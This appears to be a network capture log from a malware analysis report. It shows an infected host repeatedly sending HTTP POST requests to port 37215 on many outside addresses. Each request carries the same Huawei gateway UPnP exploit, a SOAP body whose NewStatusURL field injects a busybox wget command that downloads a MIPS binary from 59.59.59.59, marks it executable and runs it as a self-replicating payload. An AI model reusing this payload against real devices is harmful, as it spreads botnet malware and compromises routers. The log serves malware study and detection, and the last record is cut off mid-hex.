                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          249192.168.2.1544680113.35.216.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525710106 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          250192.168.2.1535470197.178.118.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525728941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          251192.168.2.1550252197.76.83.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525754929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          252192.168.2.154690041.190.36.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525784016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          253192.168.2.1534256116.176.98.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525798082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          254192.168.2.1545560197.35.40.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525815964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          255192.168.2.1548466197.84.18.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525846004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          256192.168.2.1540440197.207.125.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525875092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          257192.168.2.154214641.130.163.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525918961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          258192.168.2.1534286167.224.103.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525940895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 